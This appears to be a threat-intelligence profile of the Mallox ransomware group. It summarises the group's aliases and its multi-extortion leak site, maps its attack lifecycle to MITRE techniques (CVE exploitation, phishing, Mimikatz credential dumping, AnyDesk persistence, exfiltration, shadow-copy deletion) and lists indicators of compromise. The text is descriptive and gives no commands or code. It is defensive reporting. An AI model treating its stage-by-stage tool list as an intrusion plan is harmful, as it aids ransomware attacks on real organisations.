Threat Research

Dark Web Profile: Mallox Ransomware – SOCRadar® Cyber Intelligence Inc.

Securonix

Mallox is a ransomware strain and group active since mid-2021 known for multi-extortion and data leaks on its Tor-based site, with ongoing activity into 2024. The operation targets multiple sectors worldwide, employing a broad attack lifecycle from initial access to ransom negotiation and data publication. #Mallox #TargetCompany #Tohnichi #Fargo #MalloxDataLeak

Keypoints

  • Mallox operates under several aliases (TargetCompany, Tohnichi, Fargo) and has sustained activity since 2021, including 2024 attacks.
  • The gang pursues multi-extortion, encrypting data and threatening public data leaks via its own data-leak site.
  • Initial access combines exploit of public-facing vulnerabilities (CVE-2019-1068, CVE-2020-0618), brute-force, and phishing delivering frameworks like Cobalt Strike/Sliver.
  • Persistence and privilege escalation rely on AnyDesk for remote access and Mimikatz for credential dumping; backdoor accounts are created for re-entry.
  • Network reconnaissance with netscan.exe and lateral movement using custom scripts and stolen tokens expand infection to additional hosts.
  • Data exfiltration uses Robocopy/PowerShell to exfiltrate data; encryption uses AES-256/RSA-2048 and shadow copies are deleted to hinder recovery.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Mallox exploited unpatched RCE vulnerabilities in MS-SQL Server and ODBC interfaces. Quote: ‘Exploiting vulnerabilities in publicly exposed services such as MS-SQL and ODBC interfaces.’
  • [T1566.001] Phishing – Phishing emails with malicious attachments or links to deliver attack frameworks like Cobalt Strike and Sliver. Quote: ‘phishing emails with malicious attachments or links to deliver attack frameworks like Cobalt Strike and Sliver helps establish initial access.’
  • [T1110] Brute Force – Brute-force attacks against weakly configured services accessible over the internet. Quote: ‘Conducting brute-force attacks against weakly configured services and applications accessible over the internet.’
  • [T1021] Remote Services – Installing legitimate remote desktop software like AnyDesk to maintain access. Quote: ‘Installing legitimate remote desktop software like AnyDesk to maintain access without relying solely on malware…’
  • [T1136] Create Account – Creating backdoor accounts and scripts for persistent access. Quote: ‘Creating backdoor accounts and scripts for persistent access allows the threat actors to re-enter the system…’
  • [T1003] Credential Dumping – Using Mimikatz to dump credentials from memory. Quote: ‘Using tools like Mimikatz to dump credentials and extract plaintext passwords from memory…’
  • [T1046] Network Service Scanning – Using netscan.exe to map the network and enumerate targets. Quote: ‘Utilizing legitimate network scanning tools like netscan.exe to map out the network topology, identify active hosts…’
  • [T1021] Lateral Movement – Creating and using custom scripts/tools to move laterally; using stolen tokens. Quote: ‘Creating and using custom scripts or tools to move laterally across the network…’
  • [T1041] Exfiltration – Copying data to external servers using Robocopy/PowerShell; data can be compressed/encrypted prior to exfiltration. Quote: ‘Using command-line utilities like Robocopy or PowerShell scripts to copy sensitive data…’
  • [T1486] Data Encrypted for Impact – Encrypting files with AES-256/RSA-2048 across formats. Quote: ‘Strong encryption algorithms like AES-256 or RSA-2048 can be used to encrypt files…’
  • [T1490] Inhibit System Recovery – Deleting shadow copies to prevent recovery. Quote: ‘Shadow copies are backups created by Windows to allow users to restore previous versions of files. By deleting these shadow copies…’
  • [T1560] Archive Collected Data – Compressing data before exfiltration to hinder detection. Quote: ‘file compression tools… to compress and encrypt exfiltrated data makes it harder for defenders to detect or recover.’

Indicators of Compromise

  • [Domain] pixeldrain[.]com – example of data leaked file hosting used to publish leaks. Context: ‘The uploaded file was viewed only 29 times and downloaded 6 times… uploaded to data leak sites.’
  • [File name] HOW TO BACK FILES.txt – context: ‘Mallox drops countless HOW TO BACK FILES.txt (Any.run report)’
  • [CVE] CVE-2019-1068; [CVE] CVE-2020-0618 – context: ‘RCE vulnerabilities in Microsoft SQL Server’ and targeted versions.
  • [IP Address] Russia-based IP address – context: ‘latest uploaded sample make contact with a Russia-based IP address (JoeSandbox)’
  • [File] Encrypted files with Mallox extension and target file types (documents, images, videos, databases, archives) – context: ‘Encrypting files across a wide range of formats…’

Read more: https://socradar.io/dark-web-profile-mallox-ransomware/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint